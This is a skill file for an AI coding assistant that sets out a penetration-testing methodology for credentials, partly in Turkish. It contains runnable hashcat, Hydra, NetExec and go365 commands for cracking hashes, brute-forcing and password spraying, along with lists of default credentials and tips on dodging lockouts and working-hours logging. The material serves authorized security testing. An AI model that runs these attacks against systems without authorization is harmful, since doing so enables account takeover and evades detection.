--- name: pentest-credentials description: Credential testing methodology — hash crack secimi, wordlist generation, password spray (advisory), default cred audit. Triggers on credential testing, hash crack, Hashcat, John the Ripper, password spray, wordlist generation, cupp, CeWL, Crunch, hashid, default password, credential stuffing. license: MIT compatibility: Works with Claude Code allowed-tools: Read Write Edit Bash Grep metadata: author: badi badi-version: ">=1.24.0" category: pentest scope: advisory inspired-by: 0xSteph/pentest-ai-agents credential-tester --- # pentest-credentials Credential testing methodology. Offline hash crack + targeted wordlist + default cred audit. Online brute scope deklare ve account lockout policy farkindaligi gerektirir. ## Triggers - "hash buldum nasil crackerim" - "hashcat / john ile crack" - "wordlist olustur" - "password spray" - "default cred audit" - "credential stuffing test" ## Hash Identification ```bash # hashid (offline) hashid "$2y$12$abcd..." # bcrypt detect hashid "5f4dcc3b5aa765d61d8327deb882cf99" # MD5 # haiti (modern alt) haiti "$2y$12$abcd..." ``` Yaygin hash mode (hashcat): | Hash | Mode | Komut Ornek | |------|------|-------------| | MD5 | 0 | `hashcat -m 0 hash.txt wordlist.txt` | | SHA1 | 100 | `hashcat -m 100 ...` | | bcrypt | 3200 | `hashcat -m 3200 ...` (yavas) | | NTLM | 1000 | `hashcat -m 1000 ...` | | NetNTLMv2 | 5600 | from Responder | | Kerberos AS-REP | 18200 | from GetNPUsers.py | | Kerberos TGS-REP | 13100 | from GetUserSPNs.py | | WPA2 (hash22000) | 22000 | from hcxpcapngtool | | MS-SQL 2012+ | 1731 | T-SQL hash | | LSA secrets | 5500 (NetNTLMv1) | Responder | ## Wordlist Strategy ### Hazir Wordlist'ler ``` rockyou.txt — 14M (klasik baseline) SecLists/Passwords/* — 1500+ specialized Probable-Wordlists/ — istatistiksel sirali WeakPass dataset — buyuk birlestirilmis ``` ### Target-Specific Generation ```bash # CeWL — site icinden kelime cek (QUIET) cewl https://example.com -m 5 -w cewl-target.txt # cupp — kullanici profilinden parola (offline interactive) cupp -i # Cevap: isim, tarih, evcil hayvan, sirket, vb. -> target.txt # Mentalist (GUI / CLI) — kural-tabanli combine # Crunch — pattern-based crunch 8 12 -t Spring@^^^^ > crunch.txt # Spring@2026, Spring@1990, ... # hashcat rule sets hashcat -m 1000 hash.txt rockyou.txt -r rules/best64.rule -r rules/d3ad0ne.rule hashcat -m 0 hash.txt --increment -a 3 ?l?l?l?l?l?d?d?d # mask attack ``` ### Mutation Rules ```bash # Common mutation: Title + year + special cat words.txt | sed 's/$/2026!/' >> mutated.txt cat words.txt | sed 's/$/123/' >> mutated.txt cat words.txt | awk '{print toupper(substr($0,1,1)) substr($0,2)}' >> mutated.txt # Hashcat rules ile otomatik hashcat --stdout words.txt -r rules/leetspeak.rule | sort -u > leet.txt ``` ## Password Spray (Advisory, Scope-Gerekli) ``` 1. Hedef sistemin lockout policy'sini ogren (genel: 3-5 yanlis -> 30dk kilit) 2. Tek password tum users, 5 dakika aralikla rotate 3. Calisma saatleri disi (logging gun icinde gozden kacar) 4. Yaygin password listesi: Spring2026!, Welcome1, Company123 ``` ```bash # AD ortami (NetExec) nxc smb -u users.txt -p 'Spring2026!' --continue-on-success # O365 / Azure AD go365 -h o365.com -u users.txt -p password.txt --type spray --delay 300 # Hedef: lockout tetiklenmeden 1-2 hit ``` ## Default Cred Audit ```bash # Nuclei default-creds template nuclei -u -t default-logins/ -severity high,critical # Hydra single test hydra -L users.txt -P passwords.txt ssh -t 4 -f ``` Yaygin defaults: - admin/admin - admin/password - root/toor - Cisco/cisco - Tomcat Manager: admin/admin, manager/manager - Jenkins anonymous read ## Credential Stuffing Test (Yetkili) - Musteri kendi domain'i icin eski breach veri (HIBP API + paid lookup) - Kullanici cred reuse oranı: %5-10 (sektor ortalamasi) - Test sonucu: kac calisan eski breach cred ile login ## Offline Crack Strategy ``` 1. Hash type tespit (hashid) 2. Hizli wordlist: rockyou + rule (5dk) 3. Yavasla: rockyou + leetspeak + special (30dk) 4. Targeted: CeWL + cupp + mask (1-2 saat) 5. Fail -> Hashcat mask: bruteforce 8-10 char 6. Hala fail -> hash dehas (DB leak) ``` ## Output Sablonu ```markdown ## Credential Test — ### Hash Crack Sonuclari | User | Hash Type | Crack Time | Password | |------|-----------|------------|----------| | svc-backup | NetNTLMv2 | 4 saat | Backup2024 | | svc-deploy | NetNTLMv2 | (timeout) | (crack edilemedi) | ### Password Spray Sonuclari - Tested: "Welcome1" against 50 users - Hit: 2 user (4%) - dev-test (lockout-kacirik testi sonrasi confirm) - finance-tmp ### Bulgu Etkisi - Crackable parola: zayif policy (Backup2024 — bilinen pattern) - Default cred: 4% kullanici Welcome1 — onboarding sirasinda degistirilmemis ``` ## Out-of-Scope - Production hesabi kilitleme (rate limit asma) - Yetki disi credential exfil (sadece engagement scope) - Mass credential stuffing (3. taraf dataset)